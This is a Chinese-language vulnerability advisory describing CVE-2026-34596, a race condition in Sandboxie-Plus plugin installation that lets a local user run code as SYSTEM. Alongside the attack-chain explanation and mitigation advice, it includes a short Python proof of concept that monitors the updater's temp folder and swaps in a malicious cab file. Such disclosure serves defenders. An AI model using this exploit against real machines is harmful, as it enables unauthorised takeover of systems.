CVE-2026-34596 CVSS 7.0 高危

CVE-2026-34596 Sandboxie-Plus 本地提权漏洞

披露日期: 2026-05-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34596

漏洞类型

竞态条件 (TOCTOU)

CVSS评分

7.0 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Sandboxie-Plus

漏洞概述

Sandboxie-Plus在1.17.2及更早版本中存在TOCTOU竞态条件漏洞。在通过SandMan安装插件时，UpdUtil.exe以SYSTEM权限运行但将文件暂存在用户可写目录。攻击者可在哈希验证和提取之间替换files.cab，以SYSTEM权限执行恶意代码。

技术细节

漏洞发生在插件安装流程中的TOCTOU竞态窗口。SbieSvc以SYSTEM权限启动UpdUtil.exe，将插件文件暂存于%TEMP%\sandboxie-updater。UpdUtil先验证文件哈希，随后由install.bat解压files.cab并执行config.exe。由于验证与执行之间存在时间差，且目录对用户可写，低权限攻击者可利用竞态条件，在验证通过后、解压前，将合法的files.cab替换为包含恶意EXE的伪造cab文件。这将导致系统以SYSTEM权限运行恶意代码，无需UAC交互，获取系统完全控制权。

攻击链分析

STEP 1

1. 触发更新

攻击者诱导具有基本权限的用户通过SandMan界面安装插件。

STEP 2

2. 进程启动

SbieSvc以SYSTEM权限启动UpdUtil.exe，将文件下载至%TEMP%\sandboxie-updater。

STEP 3

3. 竞态攻击

攻击者监控临时目录，在UpdUtil验证完files.cab哈希但尚未解压执行的时间窗口内，迅速将files.cab替换为恶意文件。

STEP 4

4. 权限提升

install.bat解压被替换的files.cab并以SYSTEM权限执行其中的恶意config.exe。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import os
import time
import shutil

# Path to the vulnerable updater directory
TARGET_DIR = os.environ.get('TEMP', '') + r'\sandboxie-updater'
MALICIOUS_CAB = 'malicious.cab' # User crafted cab with malicious payload
TARGET_FILE = os.path.join(TARGET_DIR, 'files.cab')

def exploit():
    print(f"[*] Monitoring {TARGET_DIR} for update process...")
    
    while True:
        if os.path.exists(TARGET_FILE):
            print("[+] Detected files.cab. Attempting to replace...")
            try:
                # In a real scenario, precise timing or file handle monitoring is needed
                # Here we simulate the race condition replacement
                time.sleep(0.1) # Small delay to wait for hash check start
                shutil.copy(MALICIOUS_CAB, TARGET_FILE)
                print("[!] files.cab replaced with malicious payload!")
                break
            except Exception as e:
                print(f"[-] Error replacing file: {e}")
                pass
        time.sleep(0.05)

if __name__ == "__main__":
    exploit()

影响范围

Sandboxie-Plus <= 1.17.2

防御指南

临时缓解措施

建议立即升级到修复版本。若无法升级，应限制对Sandboxie更新组件的访问权限，并避免安装不可信的插件。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表